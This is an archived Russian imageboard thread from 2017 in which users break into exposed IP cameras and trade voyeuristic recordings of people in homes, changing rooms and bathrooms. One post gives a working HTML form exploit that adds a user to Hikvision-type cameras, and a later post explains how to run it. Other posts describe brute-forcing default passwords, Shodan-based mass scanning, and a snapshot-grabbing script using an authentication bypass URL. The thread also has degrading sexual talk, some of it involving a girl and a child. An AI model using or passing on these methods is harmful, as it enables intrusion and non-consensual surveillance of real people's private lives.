пиздец, школоло на каникулах, модеры лучше закрывайте/удаляйте тред
#306 #104901
>>104900
Действительно, удалите всё, а то меня на душе хреново что залил видос с итальянцев а они жизни спасают
#307 #104902
>>104901
Стремно наврено на работе для всех казаться святым человеком, спасать чьи-то жизни жизни, а после работы трахать девочку которая во внучки годится
#308 #104904
>>104902
Они в месте работают
343249 Кб, 704x576
#309 #104905
напоминаю почему не стоит поднимать тему камер
#310 #104906
>>104905
Скрин сам рисовал, леонардо?
#311 #104907
Ой блядь, вуайеристы-ноулайферы жалеют счастливую и довольную жизнью пару из солнечной Италии. Тянку явно не принуждают, даже если он ее начальник.
#312 #104908
>>104907
Ну а нахуй ей какой старикан? Она ебнутая что ли?
sage #313 #104909
>>104906
хуенардо
#314 #104910
>>104908
Ты молодой и неопытный? Тянки очень быстро морально взрослеют. В 18 им уже неинтересно с инфантильными сверстниками, и они для общения и секса выбирают мужиков постарше. В 30 они ментальные бабки с интересами бабок, даже если внешне хорошо выглядят. Ну и природа в них заложила искать опытного взрослого самца, а не сопляка.
Не все такие, но многие.
#315 #104911
>>104910
Ну может лучше с неопытным чем со старым пузатым дедком?
#316 #104913
>>104911
бабло многое решает......выбирают сами
#317 #104916
>>104911
Нет, не лучше. Этот мужик в свои 45 абсолютно по всем параметрам обходит 20-летнего, кроме тела, но на внешность тянкам обычно пох.
#318 #104917
>>104916

>на внешность тянкам обычно пох


почему?
#319 #104918
>>104917
Ты меня спрашиваешь? Я откуда знаю. Так природа устроила. Ну это не значит, что можно чуханом ходить. Тянки в первую очередь смотрят на твой статус, поэтому седина, брюхо и плешивость их не отвращает, так как ими могут обладать солидные уважаемые мужчины.
#320 #104919
>>104858

>


>


Добавить юзера то просто, у него нет прав на просмотр даже если добавить как оператора. Вопрос в том как ему эти права предоставить. А пароль на админе сбрасывать не охото, так все камеры проеб@ть можно
#321 #104920
>>104919
Так делай как крысы, меняй пароль, они скриптом уже все дефолтные пароли поменяли, сегодня запустил хикку и за полчаса 100 штук насканилось, когда раньше за то же время было раз в 10 больше.
#322 #104921
>>104919
Я не про хикку и дефолтные пассы, Я про другое... баг с auth и т.д, Хикка давно уже не актуальна
#323 #104922
>>104918
Ты неправильно думаешь о тянках, не все из них продажные шкуры, которые ведутся на статус и деньги.
#324 #104923
>>104921
дай cveшку
sage #325 #104924
>>104921
но сути то это не меняет, что чем больше ажиотажа о теме связанной с камерами тем меньше остается годноты, и такие треды как этот - тому подтверждение, зачем вы подогреваете интерес отдыхающих школьникам, которые возомнили себя мамкиными хацкерами
#326 #104925
>>104922
Это не продажность в плохом смысле этого слова, им реально нравятся взрослые опытные мужчины, особенно если они чего-то добились. Они харизматичны, умеют обращаться с женщиной, шутить, уверены в себе, у них сложившийся взгляд на жизнь. Сложно объяснить, этот факт надо принять. Я думаю ты зеркалируешь свое ощущение ситуации "вот если бы я с 50-летней теткой ради ее денег", но это не то же самое, совсем не то.
#327 #104940
>>104919
Так ты ж вроде выше писал что у тебя получилось права добавить? не?
Вот это твой пост?
>>104754
#328 #104941
>>104940
нет это не мой пост, может у него и получилось, а я только юзера могу добваить
#329 #104942
>>104873
Их ставят те, кто пользуется услугами клининга или услугами няничек. Что бы можно было смотреть что делают чужие люди у тебя дома пока тебя нет. А в маленькой спальне ты камеру в какой угол ни повесь, она получится над кроватью
sage #330 #104943
>>104925
почему ты так думаешь? ты тян?
188.187.1.14740 Кб, 704x576
#331 #104946
>>104942
Вангую в этой квартире - камера самая дорогая вещь
#333 #104950
>>104947
С 3 проиграл , лол

Ну, почему люди такие животные?
sage #334 #104953
>>104950
в каком смысле животные?
#335 #104954
>>104947
>>104947
ну так любители детей как раз и нанимают няничек
sage #336 #104955
>>104947
что у бабы с титьками на 1ой?
#337 #104956
>>104953
Голый волосатый мужик тресет личинкой человека у себя между ногами
#338 #104957
>>104955
Ты беременых ни разу не видел?
#339 #104958
>>104956
Когда у тебя будут дети, поймёшь что это вся херня и нет никоких проблем ни для тебя, ни для малыша
20170609144555679348 Кб, 1920x1080
#340 #104959
У старика походу больше не встаёт. Помучилась, помучилась и ничего не получилась
#341 #104960
>>104959
Have you recorded anything?
sage #342 #104961
>>104947
***** of from thread
sage #343 #104962
#344 #104963
>>104960
No, why asking?
#346 #104965
>>104963
I was hoping
53020680 Кб, 1280x960
#348 #104967
#349 #104984
>>104966
>>104964
Почему бы и не добавится? и протроянить его под видом новой хикки 3.0.1a
20170612091312781110 Кб, 1280x720
#351 #105035
Ахуйевший малый
#352 #105078
если на камере нет жд, как можно вести запись чтобы не на свой комп?
#353 #105079
>>105078
находишь левый регистратор со свободными ай-пи каналами и прописываешь туда свою камеру. Потом с него сохраняешь и постишь сюда.
#355 #105087
>>105079
почему у меня по во всех случаях пишет Camera Abnormal и ничего не добавляется? Пробовал добавлять на разные регистраторы камеры разных производителей РВИ, ХК, Нави и т.д.
i9 Кб, 217x215
#356 #105088
2017061416134748415,1 Мб, webm,
1280x720
#357 #105098
>>105083
Под столом :)))))
#358 #105100
>>105098
Ох, лол!
Выкладывай моар, это ахуенно.
#359 #105101
>>105098
Там вообще женщины бывают?)
#360 #105102
>>105101
Да, но вместе с парня. Зашла одна пара искали крем для массажа
#361 #105103
>>105102

>искали крем для массажа


его же в аптеках продают
sage #362 #105109
>>105103
ты идиот? в какой блядь аптеке?
#363 #105117
В любой аптеке продаются креиа лубрикпнты , идиот.
Есть что годное?
Серфю но пока и выложить нечего
sage #364 #105120
>>105117
не пизди, в аптеке только гандоны продают
#365 #105123
>>105120
Ты в аптеке, когда был последний раз в 2001?
sage #366 #105124
>>105123
14.05.2017
#367 #105126
>>105124
Ну ты серьёзно? В моей мухосрани(15к) в каждой аптеке можно купить смазку. Ты где там блять проживаешь?
sage #368 #105127
>>105126
В Перми, а ты?
#370 #105130
>>105127
Антоновка Белгородская область.
#372 #105132
>>105131
как ты снял видео с этой камеры?
#374 #105134
>>105132
там жд
#376 #105136
>>105133
Не понял, ты записал и теперь кодируешь в вебм. Почему дата не сегодняшняя? Её что блять заблочили?
#377 #105138
>>105134
Ты прописал туда юзера своего, сбрутил или перенакатил админа со своим паролем? Есть видео как в бидэ подмываются? доставь плз!
sage #378 #105140
>>105138
Озабоченный что ли?
sage #379 #105141
>>105131
>>105135
ну а ты мудак конечно, тебе сказали не постить сюда ничего чтобы школьникам хайп не поднимать, дебил блядь.
#380 #105142
>>105140
не, просто фетиш у меня такой.
sage #381 #105143
>>105142
Фетиш смотреть как кто-то моет жопу?
#382 #105144
>>105135
Походу камера уже сдохла ..
#383 #105145
>>105144
больше выкладывай в тред, мудак
#384 #105146
>>105143
почему жопу? пизду!
#385 #105147
>>105144
все годные уже здохли, что засветились тут
#386 #105148
>>105146
Ты хоть знаешь для чего биде нужно?
#387 #105149
>>105129
Кого блять покупала ? Хуй разберешь
sage #388 #105150
>>105129
а зачем дилдак фоткать на телефон?
#389 #105151

>>1051>>105148


Умываться?
#390 #105152
>>105135
Этo камера ещё работает?
#391 #105156
>>105152
Работает, но какой-то пидор сбросил все параметры на дефолтные
Другой вариант, что какой-то пидор изменил пароль админа и владельцу небыло других вариантов как сбросить всё
sage #392 #105157
>>105156
3й вариант - какой то пидор постит скрины и записи в тред, набегают школьники, и крысят камеры проебывая всю годноту
#393 #105158
>>105157
Не понимаю как пост скрина или запись может убить камеру? Он ведь не постит ип
sage #394 #105159
>>105158
типа через скрин нельзя ip узнать
#395 #105161
<html>
<body>
<form action="https://ipadress/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="<&#63;xml&#32;version" value="&apos;1&#46;0&apos;&#32;encoding&#61;&apos;utf&#45;8&apos;&#63;><User><id>2</id><userName>test2</userName><password>Qq123456789</password><Extensions><bondIp><ipAddress>0&#46;0&#46;0&#46;0</ipAddress></bondIp><attribute><inherent>true</inherent></attribute></Extensions></User>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Вот сплоит для добавления пользователя. Пашет только на старых версиях прошивок.
Если ещё рабочий сплоит на перезагрузку камеры. Если надо выложу.
sage #396 #105162
>>105161
выкладывай
#397 #105163
>>105161
Напиши инструкцию куда этот код вписывать
#398 #105164
>>105161

ЛОЛ :))) Я уже испугался что кто-то выдал метод. Давайте школьники, пытайтесь добавить пользователеь этим сплойтом
sage #399 #105166
>>105163
в анус себе впиши пёс
#400 #105167
>>105161
пидор
1146 Кб, 1280x720
#401 #105168
>>105161
давай на перезагрузку, я буду сейчас перезагружать вам все камеры
#402 #105178
Подскажите какие книги почитать чтобы тоже стать хакером?
#403 #105179
>>105178

Уголовный кодекс
#404 #105180
>>104532
Анон, что за страна? город? Ни как не могу найти эту камеру, живая ещё?
#405 #105181
>>105179
а серьезно?
#406 #105182
малолетние крысятнические ублюдки
178 Кб, 1920x1080
#407 #105183
#408 #105184
>>105182
Своим сообщением ты вызываешь дополнительный интерес.
#409 #105185
>>105184
мне похуй
1319 Кб, 2048x1536
#410 #105191
#411 #105192
модер пидр удаляет сообщения
#412 #105196
>>105161
И что это теперь подстановкой в блокнотике ip адресса в двуъ местах сможно камеры ломать?
#413 #105216
>>105196
Создаешь php или html файл пихаешь все туда, не забыв поменять IP , запускаешь скрипт. Проще всего скачать OpenServer и скинуть скрипт в папку domain/localhost.Запускаешь сервак . В браузере пишешь localhost/имяскрипта.php(html), если все сделано верное лицезрееш кнопку submit жмакаеш на нее и добавляется оператор. Сказу скажу что мало камер будут поддаватьcя этy уязвимость потому что она древняя (2013 год). Сплоит рабочий проверил у себя на работе на старой камере у которой прошивка не обнавлялась
#414 #105218
>>105216
Зря так подробно:3 этот сплоит работает на тех камерах где kika может скрин вытянуть? Или этот ещё древнее?
так там серьёзно только в двух местах rhost воткнуть?
#415 #105219
>>105216
напиши уж тогда, чтобы она автоматом подставлял айпишники из текстового файлика и перебирала их, а то заёбищно переписывать его под каждый айпишник?
6a6577afbc6a7418 Кб, 451x338
#416 #105223
Палите уже как добавить юзера с правами, пока хакеры не набежали
132 Кб, 704x576
#417 #105229
pec39 Кб, 1280x720
#418 #105231
m21 Кб, 704x576
#419 #105232
a27 Кб, 704x576
#420 #105233
#421 #105282
Просканил всю Европу (то есть то что выдал шодан) И вот такая статистика кому интересно.

В правой колонке число камер с которых смог сохронить скрин

MariaDB [sh]> select country_code, count(*) as c from sh inner join country_continent using (country_code) where httpErrorNo = 0 and continent_code = 'EU' group by country_code order by c desc;
+--------------+------+
| country_code | c |
+--------------+------+
| RU | 8240 |
| UA | 4115 |
| NL | 1958 |
| GB | 1869 |
| FR | 1598 |
| PL | 1520 |
| RO | 1474 |
| IT | 1465 |
| BG | 1357 |
| CZ | 1230 |
| ES | 804 |
| PT | 762 |
| TR | 746 |
| DE | 715 |
| LT | 601 |
| HU | 525 |
| BE | 475 |
| SK | 467 |
| DK | 443 |
| LV | 362 |
| SE | 332 |
| EE | 297 |
| MD | 293 |
| CH | 241 |
| AT | 217 |
| RS | 202 |
| IE | 180 |
| FI | 173 |
| BY | 153 |
| GR | 134 |
| NO | 133 |
| SI | 75 |
| AL | 59 |
| MK | 53 |
| IS | 38 |
| HR | 35 |
| MT | 33 |
| BA | 33 |
| LU | 20 |
| AD | 3 |
| GI | 3 |
| ME | 2 |
| FX | 2 |
| GG | 1 |
| MC | 1 |
+--------------+------+
#421 #105282
Просканил всю Европу (то есть то что выдал шодан) И вот такая статистика кому интересно.

В правой колонке число камер с которых смог сохронить скрин

MariaDB [sh]> select country_code, count(*) as c from sh inner join country_continent using (country_code) where httpErrorNo = 0 and continent_code = 'EU' group by country_code order by c desc;
+--------------+------+
| country_code | c |
+--------------+------+
| RU | 8240 |
| UA | 4115 |
| NL | 1958 |
| GB | 1869 |
| FR | 1598 |
| PL | 1520 |
| RO | 1474 |
| IT | 1465 |
| BG | 1357 |
| CZ | 1230 |
| ES | 804 |
| PT | 762 |
| TR | 746 |
| DE | 715 |
| LT | 601 |
| HU | 525 |
| BE | 475 |
| SK | 467 |
| DK | 443 |
| LV | 362 |
| SE | 332 |
| EE | 297 |
| MD | 293 |
| CH | 241 |
| AT | 217 |
| RS | 202 |
| IE | 180 |
| FI | 173 |
| BY | 153 |
| GR | 134 |
| NO | 133 |
| SI | 75 |
| AL | 59 |
| MK | 53 |
| IS | 38 |
| HR | 35 |
| MT | 33 |
| BA | 33 |
| LU | 20 |
| AD | 3 |
| GI | 3 |
| ME | 2 |
| FX | 2 |
| GG | 1 |
| MC | 1 |
+--------------+------+
#422 #105287
>>105282
Ты какой запрос делал?
#423 #105290
>>105287
webs -goahead
Но это для всех хиквижн которые я раньше брутил по дефолтными паролями. Для этой новой уезвимости походу только app-webs имеет смысл искать
#425 #105298
>>105292
Это что за камера? хиквижн или что-то другое?
#427 #105301
>>105300
>>105292
А потом у них был анал и жили они долго и счастливо
#428 #105303
>>105298
ubnt помойму
#429 #105304
>>105301
Не удивлюсь если она его отстрапонила.))
#430 #105313
>>105303
как отсканил? какая уезвимост? подробнее
#431 #105320
>>104004 (OP)
1. Меняем порт на камере на нестандартный.
2. Меняем дефолтные логин\пароль.
3. Оставляем в роутере доступ только с необходимых ip, остальные блочим.
4. Меняем на роутере дефолтные логин\пароль.

Хикка отсасывает!
#432 #105321
Мне вот инетересно. Поменял какой-то хуй все дефолтные пароли на камерах. А что владельцы? Забили на них? У них же тоже все доступы должны пойти по пизде? Первое что приходит на ум, это сбросить все к заводским настройкам, после чего эти камеры снова засветились бы. А этого почему-то не происходит. Почему, а?
ret136 Кб, 1920x1080
#433 #105322
Xr45g8ldF40 Кб, 704x576
#434 #105323
95.107.54.8726 Кб, 704x576
#435 #105324
dx63kaT4h41 Кб, 1920x1080
#436 #105325
H6k3Na61dF349 Кб, 704x576
#437 #105326
sage #438 #105327
>>105321
Это все очень странно.
#439 #105331
>>105321
Если сборсить настройки а камера подключена через вайфай, то всё, потерял её. Нужно подключиться по местной сети и переустроить
#440 #105336
>>105331
Ебать, иди проспись.
dG51lvI93g28 Кб, 704x576
#442 #105344
454,6 Мб, webm,
1280x720
#443 #105347
20170621191624298477 Кб, 2688x1520
#444 #105348
чую что-то интересное
#445 #105349
Вот это камера была, пока какой-то евнух не сменил пароль
Благо, я успел наделать записей, как все работницы переодеваются
#446 #105351
>>105349
Нихуя там не было интересного. Это какое-то кафе в подмосковье(я даже на гугл-улицах это место находил, но потом забыл).
Дальше лифчиков они не раздевались там.
Но если пароль сменили, то всё равно жаль.
sage #447 #105354
>>105351
почему они раздевались только до лифчиков? они после работы не моются что ли?
#448 #105355
>>105351
Это вообще Казахстан блять, там не только раздевались, но и молились регулярно
#449 #105356
>>105354
Видимо, не моются. Просто скидывали официантскую спецодежду и одевали гражданскую. Чучмеки, хуле.
>>105355
Не замечал, чтобы молились, а вот что переодевались все вперемешку - и бабы и мужики - это да. И никто друг друга не стеснялся. Но сиськи не показывали. ни наедине ни перед мужиками. Но ебать они страшные. Откуда берутся все эти эротические фантазии про азиаток, если даже официантки у них страшны как атомная война?
sage #450 #105357
>>105356
а что в них страшного кроме ебала?
sage #451 #105358
>>105355

>молились


а какая у них религия?
sage #452 #105359
Зачем вообще ставить камеру в раздевалку? Или это какой-нибудь охранник дрочер запрятал камеру где-нибудь в стене и её никто не замечает?
ch0500000000394000100 (1)2,9 Мб, webm,
352x288
#453 #105360
А вот я, может, и пизжу.
Посмотрел те записи, которые делал и вроде помещение-то похоже, да не совсем. Гладилка там у них тоже есть
201706221621366115,5 Мб, webm,
1920x1080
#454 #105362
Как вы дымаете, зачем установлена это камера?
sage #455 #105365
>>105362
зачем?
#456 #105366
>>105356
Да все фапабельны были, кроме разве что жирухи в труханах-парашютах
Хотя, уверен, что кто-то из местных и на нее сладко передергивал
#457 #105367
>>105360
Не, это другое что-то
sage #459 #105372
>>105366
Запили видео из той раздевалки
hZw74MqT063 Кб, 1280x720
#460 #105375
#461 #105455
Есть регистратор, к нему не подключен диск для записи, можно ли как-то самому подключить диск для запис
Царь #462 #105459
Царь #463 #105460
https://t.me/joinchat/AAAAAEREfMIQ1-hQLt0f9A конфа...
И распрастроните среди жельцов, как вы это любите....
#464 #105463
>>105460
как подключится через веб клиент?
#465 #105521
А что за китайская порога за 28 баксов с камерами?
#466 #105538
>>105459
Что за конфач? Писать нельзя
#467 #105539
>>105521
Что за прога?
878180 Кб, 1920x1080
#469 #105557
чатик в настройках камеры
#470 #105567
Аноны, скиньте пожалуйста, если кто ловил, шликающих тянок. Хотя бы скрины.
#471 #105586
>>105300
>>105292

Ебать СУКА, вы че охуели??!! Это мои соседи!! ЕБАТЬ! Дайте IP срочно!
download (43)559 Кб, 2688x1520
#472 #105605
#473 #105607
>>105586
172.0.0.1
#476 #105621
>>105614
у первой камеры айпи подтер?
#477 #105622
#480 #105626
>>105614
охуенно, конечно, я бы обменялся с тобой, но у тебя скорее всего не будет желания, так?
#481 #105629
>>105623
>>105624

нахуя ты это тут выложил? Ты ж не думаешь, что это гинекологические кресла, а?
#482 #105631
>>105615
Хороша была камера, всё там было)) Только вот я не понял, мужик белый вроде как я понял с женой своей в одной комнате был, а эта негритянка вроде как дочка его, мне так изначально казалось, судя по поведению и тд. Но херли он потом и её трахать начал? Значит не дочка?
#483 #105632
>>105631
Мужик белый, а дочка негритянка.
Нормально же.
Дочка.
#484 #105633
>>105631
>>105632
та какая нахуй дочка. Там два разных мужика её потрахивали. Потом еще одна негритоска появилась и уже её чаще приходовали. Сложилось мнение, что негритоска просто жила там с оплатой сексом, студентка, мож. Иногда мужики пропадали надолго, более недели. Она тогда селфилась голая на телефон часто.
#486 #105635
>>105634
прикол. Это что такое вообще? Это посуточная хата или этот чел там постоянно? Бабы есть там?
#488 #105637
>>105634
В "Сам себе режиссер" отправит.
#489 #105638

>>10563


это дочка негритянки из другой комнаты. он ее трахать не так давно начал, до этого все взрослую ебал. один раз даже тройничок устроили. ооочень странная фигня ) камера мертва?
#490 #105639
>>105638
Давно уже.
#491 #105640
>>105629
Там просто анализы крови берут
keepcalm158 Кб, 1920x1080
#492 #105641
Внимательно прочитайте что на плакате на стене написанно :)
#493 #105646
>>105641
>>105540
LOL
Уже понятно китайцы на своих камерах бакдоры поставили. А потом программы продают по 28 евро..
#494 #105647
>>105636
Есть бабы голые в бассейнах?
#495 #105648
>>104463
Четвертая камера адовая, такого я ни на одном порносайте не видел.
54665432154513254865131651,9 Мб, webm,
352x288
#496 #105650
Анастасия
#497 #105651
>>105646
Реально продают и не только китайцы. цена одинаковая. Софт хз какой, но там фишка, что они обновления дают и сами палят камеры и дают адреса с явками\паролями. Достаточно старая тема, возможно уже прикрыли.
#498 #105652
>>105648
Шторы понравились?
#499 #105653
>>105650
Видимо не всё сломали, наблюдал эту камеру год назад.
#500 #105654
>>105653
в той комнате, где она закрывает камеру чем-то - там есть что-то стоящее?
#501 #105655
>>105654
Я коридор вспомнил больше, видимо закрывала остальное раз не сохранил себе в историю.
546532159 Кб, 1280x720
#502 #105657
бдительный французский товарищ.
admin000083.10.176.30221 Кб, 352x288
#503 #105674
#504 #105675
>>105657
Я бы обосрался
126 Кб, 352x288
#505 #105676
#506 #105686
Насканил я, значит, 30000 хостов в ДС. Запустил хикку, а она мне открыла 70 картинок. Что за хуйня, товарищи?
#507 #105690
Тред достиг бамплимита, поэтому создал новый >>105689 (OP)
#508 #105700
>>105686
лей список.
#509 #105750
>>104959
>>104877
>>104874
>>104870
>>104868
>>105614
Какой пароль там был?
#510 #105784
1502975937834122 Кб, 500x500
#511 #106399
1502975937834122 Кб, 500x500
#512 #106400
#513 #107105
>>104362

>Причесал скриптик - и надо признать довольно лампово получилось.в


>https://github.com/makaka-hacker/kikka


>Скрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46


>


>


>Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.


>


>Но:


>1) часть снимков выходит битая - не только jpg качается


>2) я хз как в баше потоки организовать - поэтому всего один


>3) не windows :0


>4) Все равно надо добручивать - искать пасс от годной камеры


>5) bash не айс для таких дел


>


>Добра анону, который в /b тред создал

Тред утонул или удален.
Это копия, сохраненная 25 декабря 2017 года.

Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее

Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
« /web/В начало тредаВеб-версияНастройки
/a//b//mu//s//vg/Все доски